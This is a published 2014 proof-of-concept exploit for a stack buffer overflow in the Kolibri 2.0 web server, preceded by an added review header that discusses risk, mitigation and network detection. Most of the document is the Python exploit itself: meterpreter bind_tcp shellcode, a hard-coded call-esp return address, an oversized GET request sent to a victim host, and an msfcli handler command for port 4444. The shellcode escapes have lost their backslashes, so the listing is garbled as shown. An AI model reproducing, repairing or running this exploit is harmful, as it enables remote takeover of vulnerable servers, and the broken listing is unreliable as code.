
Kolibri 2.0 Stack Buffer Overflow

Posted on 25 April 2014

# Review notes (defender stance). The published listing is kept below
# byte-for-byte; only this comment header is added.
#
# What this is: a 2014 proof-of-concept for a stack buffer overflow in the
# Kolibri 2.0 HTTP server, reached by sending a GET whose request-target is
# several hundred bytes long (the author's own description: "a long GET
# command"). As published, the listing has lost the backslashes of its
# "\x.." escapes during extraction (e.g. "x29xc9"), so it is not
# syntactically meaningful Python as shown; it is deliberately left
# unrepaired here.
#
# Risk: the request carries no credentials -- the script only opens a TCP
# connection and sends one GET -- so exposure is governed entirely by
# network reachability of the listening port. The payload used is a
# bind_tcp one, i.e. on success the server host itself starts listening
# (port 4444 per the msfcli line below).
#
# Mitigation: do not expose Kolibri 2.0 on a reachable interface; retire or
# replace it (the vendor version/date noted below is from 2014). Where it
# must stay up, front it with a reverse proxy/WAF that rejects
# request-targets beyond a sane length. The listing hard-codes a single
# return address ("call esp", see the eip line) for one specific
# "Windows XP SP3, Spanish" build; DEP/ASLR on the host would be expected to
# invalidate that technique, as would any other OS build.
#
# Detection: the on-wire indicator is a GET whose request-target is made of
# long runs of a single repeated byte ("A", "C", "B", 0x90) -- by the
# author's sizing arithmetic below, nop+shellcode+junk is padded to 515
# bytes with a further 75 appended, assuming the escapes were intact. A rule
# on request-target length and repeated-byte runs covers it. A new listener
# on TCP/4444 on the server, followed by an inbound connection to it, is the
# post-exploitation indicator.
#!/usr/bin/python # Exploit Title: Kolibri GET request Stack buffer Overflow # Date: 25 April 2014 # Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org # Vendor Homepage: http://www.senkas.com/kolibri/download.php # Version: Kolibri 2.0 # Tested on: Windows XP SP3, Spanish # Thanks:To my wife for putting up with my possessions # Description: # A buffer overflow is triggered when a long GET command is sent to the server. import socket, sys, os, time if len(sys.argv) != 3: print "[*] Uso: %s <Ip Victima> <Puerto> " % sys.argv[0] print "[*] Exploit created by Polunchis" print "[*] https://www.intrusionlabs.com.mx" sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) #./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b 'x00xffx0ax0dx20x40' shellcode = ( "x29xc9x83xe9xb5xe8xffxffxffxffxc0x5ex81x76x0e" "xaax86x33x5fx83xeexfcxe2xf4x56x6exbax5fxaax86" "x53xd6x4fxb7xe1x3bx21xd4x03xd4xf8x8axb8x0dxbe" "x0dx41x77xa5x31x79x79x9bx79x02x9fx06xbax52x23" "xa8xaax13x9ex65x8bx32x98x48x76x61x08x21xd4x23" "xd4xe8xbax32x8fx21xc6x4bxdax6axf2x79x5ex7axd6" "xb8x17xb2x0dx6bx7fxabx55xd0x63xe3x0dx07xd4xab" "x50x02xa0x9bx46x9fx9ex65x8bx32x98x92x66x46xab" "xa9xfbxcbx64xd7xa2x46xbdxf2x0dx6bx7bxabx55x55" "xd4xa6xcdxb8x07xb6x87xe0xd4xaex0dx32x8fx23xc2" "x17x7bxf1xddx52x06xf0xd7xccxbfxf2xd9x69xd4xb8" "x6dxb5x02xc2xb5x01x5fxaaxeex44x2cx98xd9x67x37" "xe6xf1x15x58x55x53x8bxcfxabx86x33x76x6exd2x63" "x37x83x06x58x5fx55x53x63x0fxfaxd6x73x0fxeaxd6" "x5bxb5xa5x59xd3xa0x7fx11x02x84xf9xeex31x5fxbb" "xdaxbaxb9xc0x96x65x08xc2x44xe8x68xcdx79xe6x0c" "xfdxeex84xb6x92x79xccx8axf9xd5x64x37xdex6ax08" "xbex55x53x64xc8xc2xf3x5dx12xcbx79xe6x35xaaxec" "x37x09xfdxeex31x86x62xd9xccx8ax21xb0x59x1fxc2" "x86x23x5fxaaxd0x59x5fxc2xdex97x0cx4fx79xe6xcc" "xf9xecx33x09xf9xd1x5bx5dx73x4ex6cxa0x7fx87xf0" "x76x6cx03xc5x2ax46x45x33x5f" ) nop = "A" * 33 + 'x90' * 20 junk = "C" *(515-(len(nop)+len(shellcode))) opcode= "x83xc4x44x83xc4x44x83xc4x44xffxe4" eip = 'x63x46x92x7c' #7c86467b 7C924663 call 
esp buffer = nop + shellcode + junk + eip + opcode + "B" * 60 req = ("GET /" + buffer + " HTTP/1.1 " "Host: " + host + ":" + str(port) + " " "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 " "Connection: keep-alive ") print " [+] Connecting to %s:%d" % (host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) print " [+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode)) s.send(req) data = s.recv(1024) print " [+] Closing connection.." s.close() print "[+] Exploit Sent Successfully" print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444 " print " " time.sleep(3) os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E") print "[-] Connection lost from " + host + ":4444 " except: print "[-] Could not connect to " + host + ":4444 " sys.exit(0)

 
